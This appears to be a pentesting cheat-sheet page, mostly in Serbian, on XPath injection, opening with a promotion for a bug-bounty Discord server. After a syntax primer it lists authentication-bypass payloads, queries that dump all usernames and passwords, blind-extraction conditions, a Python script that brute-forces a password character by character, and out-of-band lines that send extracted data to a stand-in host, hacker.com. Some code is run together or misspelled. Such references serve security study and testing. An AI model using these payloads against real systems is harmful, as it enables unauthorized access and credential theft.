Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us onDiscord and start collaborating with top hackers today!
Basic Syntax
Tehnika napada poznata kao XPath Injection se koristi za iskorišćavanje aplikacija koje formiraju XPath (XML Path Language) upite na osnovu korisničkog unosa za upit ili navigaciju XML dokumentima.
Nodes Described
Izrazi se koriste za selektovanje različitih čvorova u XML dokumentu. Ovi izrazi i njihovi opisi su sažeti u nastavku:
nodename: Svi čvorovi sa imenom "nodename" su selektovani.
/: Selekcija se vrši iz korenskog čvora.
//: Čvorovi koji odgovaraju selekciji iz trenutnog čvora su selektovani, bez obzira na njihovu lokaciju u dokumentu.
.: Trenutni čvor je selektovan.
..: Roditeljski čvor trenutnog čvora je selektovan.
@: Atributi su selektovani.
XPath Examples
Primeri putanji izraza i njihovih rezultata uključuju:
bookstore: Svi čvorovi nazvani "bookstore" su selektovani.
/bookstore: Korenski element bookstore je selektovan. Napominje se da apsolutna putanja do elementa počinje sa kosom crtom (/).
bookstore/book: Svi elementi knjiga koji su deca bookstore su selektovani.
//book: Svi elementi knjiga u dokumentu su selektovani, bez obzira na njihovu lokaciju.
bookstore//book: Svi elementi knjiga koji su potomci elementa bookstore su selektovani, bez obzira na njihovu poziciju ispod elementa bookstore.
//@lang: Svi atributi nazvani lang su selektovani.
Utilization of Predicates
Predikati se koriste za preciziranje selekcija:
/bookstore/book[1]: Prvi element knjige dete elementa bookstore je selektovan. Rešenje za IE verzije 5 do 9, koje indeksiraju prvi čvor kao [0], je postavljanje SelectionLanguage na XPath putem JavaScript-a.
/bookstore/book[last()]: Poslednji element knjige dete elementa bookstore je selektovan.
/bookstore/book[last()-1]: Pretposlednji element knjige dete elementa bookstore je selektovan.
/bookstore/book[position()<3]: Prva dva elementa knjiga deca elementa bookstore su selektovana.
//title[@lang]: Svi elementi naslova sa atributom lang su selektovani.
//title[@lang='en']: Svi elementi naslova sa vrednošću atributa "lang" koja je "en" su selektovani.
/bookstore/book[price>35.00]: Svi elementi knjiga u bookstore sa cenom većom od 35.00 su selektovani.
/bookstore/book[price>35.00]/title: Svi elementi naslova elemenata knjiga u bookstore sa cenom većom od 35.00 su selektovani.
Handling of Unknown Nodes
Džokeri se koriste za usklađivanje nepoznatih čvorova:
*: Usklađuje se sa bilo kojim element čvorom.
@*: Usklađuje se sa bilo kojim atribut čvorom.
node(): Usklađuje se sa bilo kojim čvorom bilo koje vrste.
Dalji primeri uključuju:
/bookstore/*: Selektuje sve čvorove elementa dece elementa bookstore.
//*: Selektuje sve elemente u dokumentu.
//title[@*]: Selektuje sve elemente naslova sa najmanje jednim atributom bilo koje vrste.
All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name
All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()
Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)
Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
Identifikacija i krađa šeme
andcount(/*)=1#rootandcount(/*[1]/*)=2#count(root) = 2 (a,c)andcount(/*[1]/*[1]/*)=1#count(a) = 1 (b)andcount(/*[1]/*[1]/*[1]/*)=0#count(b) = 0andcount(/*[1]/*[2]/*)=3#count(c) = 3 (d,e,f)andcount(/*[1]/*[2]/*[1]/*)=0#count(d) = 0andcount(/*[1]/*[2]/*[2]/*)=0#count(e) = 0andcount(/*[1]/*[2]/*[3]/*)=1#count(f) = 1 (g)andcount(/*[1]/*[2]/*[3]/[1]*)=0#count(g) = 0#The previous solutions are the representation of a schema like the following#(at this stage we don't know the name of the tags, but jus the schema)<root><a><b></b></a><c><d></d><e></e><f><h></h></f></c></root>andname(/*[1])="root"#Confirm the name of the first tag is "root"andsubstring(name(/*[1]/*[1]),1,1)="a"#First char of name of tag `<a>` is "a"and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1))=105#Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)#Stealing the schema via OOBdoc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
Authentication Bypass
Primer upita:
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
OR zaobići u korisničkom imenu i lozinki (ista vrednost u oba)
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
Select account
Select the account using the username and use one of the previous values in the password field
Zloupotreba null injekcije
Username: ' or 1]%00
Dupli OR u korisničkom imenu ili u lozinki (važi samo za 1 ranjivo polje)
VAŽNO: Obratite pažnju da je "and" prva operacija koja se izvršava.
Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
Ekstrakcija stringova
Izlaz sadrži stringove i korisnik može manipulisati vrednostima za pretragu:
/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
Blind Explotation
Dobijanje dužine vrednosti i njeno izdvajanje poređenjem:
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='#True if length equals 4' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='#True is first equals "a"substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)...and ( if ( $employee/role=2 ) thenerror()else0 )... #When error() is executed it rises an error and never returns a value
Python Primer
import requests, stringflag =""l =0alphabet = string.ascii_letters + string.digits +"{}_()"for i inrange(30):r = requests.get("http://example.com?action=user&userid=2 and string-length(password)="+str(i))if ("TRUE_COND"in r.text):l = ibreakprint("[+] Password length: "+str(l))for i inrange(1, l +1):#print("[i] Looking for char number " + str(i))for al in alphabet:r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)if ("TRUE_COND"in r.text):flag += alprint("[+] Flag: "+ flag)break
doc(concat("http://hacker.com/oob/", RESULTS))doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))#Instead of doc() you can use the function doc-availabledoc-available(concat("http://hacker.com/oob/", RESULTS))#the doc available will respond true or false depending if the doc exists,#user not(doc-available(...)) to invert the result if you need to